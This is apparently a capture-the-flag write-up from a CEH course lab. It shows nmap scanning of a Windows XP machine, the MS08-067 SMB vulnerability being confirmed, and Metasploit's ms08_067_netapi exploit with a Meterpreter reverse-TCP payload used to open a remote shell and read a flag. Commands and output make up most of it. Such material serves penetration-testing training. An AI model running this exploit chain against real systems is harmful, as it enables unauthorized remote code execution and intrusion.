Another machine available during the CEH course, but this one was pretty straight forward.

Maq103 – MÁQUINA 192.168.10.103
Descrição: Isso que dá utilizar um sistema operacional desatualizado e sem suporte da fabricante.

The description fo this machine is telling us the OS is not up-to-date anymore and the vendor support is over, so lets look for active services:

root@parrot:~# nmap -sV -O 192.168.10.103
Nmap scan report for 192.168.10.103
Host is up (0.015s latency).
Not shown: 996 closed ports
PORT STATE SERVICE VERSION
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
445/tcp open microsoft-ds Microsoft Windows XP microsoft-ds
3389/tcp open ms-wbt-server Microsoft Terminal Service
 
Network Distance: 2 hops
Service Info: OSs: Windows, Windows XP; CPE: cpe:/o:microsoft:windows, cpe:/o:microsoft:windows_xp

Good, SMB is active and being one of the primary attack vectors is where we’ll put our efforts. nmap had a script to check against a few vulnerabilities at once, the smb-check-vulns, but it was split into six scripts so we’ll need to run them separately.

Looking for the nmap scripts.

root@parrot:~# locate *.nse | grep smb
/usr/share/nmap/scripts/smb-brute.nse
/usr/share/nmap/scripts/smb-double-pulsar-backdoor.nse
/usr/share/nmap/scripts/smb-enum-domains.nse
/usr/share/nmap/scripts/smb-enum-groups.nse
/usr/share/nmap/scripts/smb-enum-processes.nse
/usr/share/nmap/scripts/smb-enum-sessions.nse
/usr/share/nmap/scripts/smb-enum-shares.nse
/usr/share/nmap/scripts/smb-enum-users.nse
/usr/share/nmap/scripts/smb-flood.nse
/usr/share/nmap/scripts/smb-ls.nse
/usr/share/nmap/scripts/smb-mbenum.nse
/usr/share/nmap/scripts/smb-os-discovery.nse
/usr/share/nmap/scripts/smb-print-text.nse
/usr/share/nmap/scripts/smb-protocols.nse
/usr/share/nmap/scripts/smb-psexec.nse
/usr/share/nmap/scripts/smb-security-mode.nse
/usr/share/nmap/scripts/smb-server-stats.nse
/usr/share/nmap/scripts/smb-system-info.nse
/usr/share/nmap/scripts/smb-vuln-conficker.nse
/usr/share/nmap/scripts/smb-vuln-cve-2017-7494.nse
/usr/share/nmap/scripts/smb-vuln-cve2009-3103.nse
/usr/share/nmap/scripts/smb-vuln-ms06-025.nse
/usr/share/nmap/scripts/smb-vuln-ms07-029.nse
/usr/share/nmap/scripts/smb-vuln-ms08-067.nse
/usr/share/nmap/scripts/smb-vuln-ms10-054.nse
/usr/share/nmap/scripts/smb-vuln-ms10-061.nse
/usr/share/nmap/scripts/smb-vuln-ms17-010.nse
/usr/share/nmap/scripts/smb-vuln-regsvc-dos.nse
/usr/share/nmap/scripts/smb2-capabilities.nse
/usr/share/nmap/scripts/smb2-security-mode.nse
/usr/share/nmap/scripts/smb2-time.nse
/usr/share/nmap/scripts/smb2-vuln-uptime.nse

After a few tries I found one with chances to work.

root@parrot:~# nmap -sV -O 192.168.10.103 --script smb-vuln-ms08-067.nse
Host script results:
| smb-vuln-ms08-067:
| VULNERABLE:
| Microsoft Windows system vulnerable to remote code execution (MS08-067)
| State: LIKELY VULNERABLE
| IDs: CVE:CVE-2008-4250
| The Server service in Microsoft Windows 2000 SP4, XP SP2 and SP3, Server 2003 SP1 and SP2,
| Vista Gold and SP1, Server 2008, and 7 Pre-Beta allows remote attackers to execute arbitrary
| code via a crafted RPC request that triggers the overflow during path canonicalization.
|
| Disclosure date: 2008-10-23
| References:
| https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-4250
|_ https://technet.microsoft.com/en-us/library/security/ms08-067.aspx

We are going to use the Metasploit for this one:

root@parrot:~# service postgresql start
root@parrot:~# msfconsole

Now we’ll search for the exploit, set the desired payload and set the options for the exploit:

msf > search MS08-067
Name Disclosure Date Rank Description
---- --------------- ---- -----------
exploit/windows/smb/ms08_067_netapi 2008-10-28 great MS08-067 Microsoft Server Service Relative Path Stack Corruption
 
msf > use exploit/windows/smb/ms08_067_netapi
msf exploit(windows/smb/ms08_067_netapi) > set payload windows/meterpreter/reverse_tcp
 
msf exploit(windows/smb/ms08_067_netapi) > set RHOST 192.168.10.103
RHOST => 192.168.10.103
msf exploit(windows/smb/ms08_067_netapi) > set RPORT 445
RPORT => 445
msf exploit(windows/smb/ms08_067_netapi) > set LHOST 192.168.200.2
LHOST => 192.168.200.2

It’s time to seat the finger (?! – senta o dedo)

msf exploit(windows/smb/ms08_067_netapi) > exploit
[*] Started reverse TCP handler on 192.168.200.2:4444
[*] 192.168.10.103:445 - Automatically detecting the target...
[*] 192.168.10.103:445 - Fingerprint: Windows XP - Service Pack 2 - lang:Unknown
[*] 192.168.10.103:445 - We could not detect the language pack, defaulting to English
[*] 192.168.10.103:445 - Selected Target: Windows XP SP2 English (AlwaysOn NX)
[*] 192.168.10.103:445 - Attempting to trigger the vulnerability...
[*] Sending stage (179779 bytes) to 192.168.10.103
[*] Meterpreter session 2 opened (192.168.200.2:4444 -> 192.168.10.103:1030) at 2018-03-27 09:54:59 -0300
 
meterpreter > shell
Process 876 created.
Channel 1 created.
Microsoft Windows XP [Version 5.1.2600]
(C) Copyright 1985-2001 Microsoft Corp.
 
C:\WINDOWS\system32>type c:\flag.txt
ch4mp10n5-n3v3r-g1v3-up!

As soon as the session was open we invoke a shell and read the flag which we already knew where to find. The machine is wide open letting us do anything we want. We’re done here.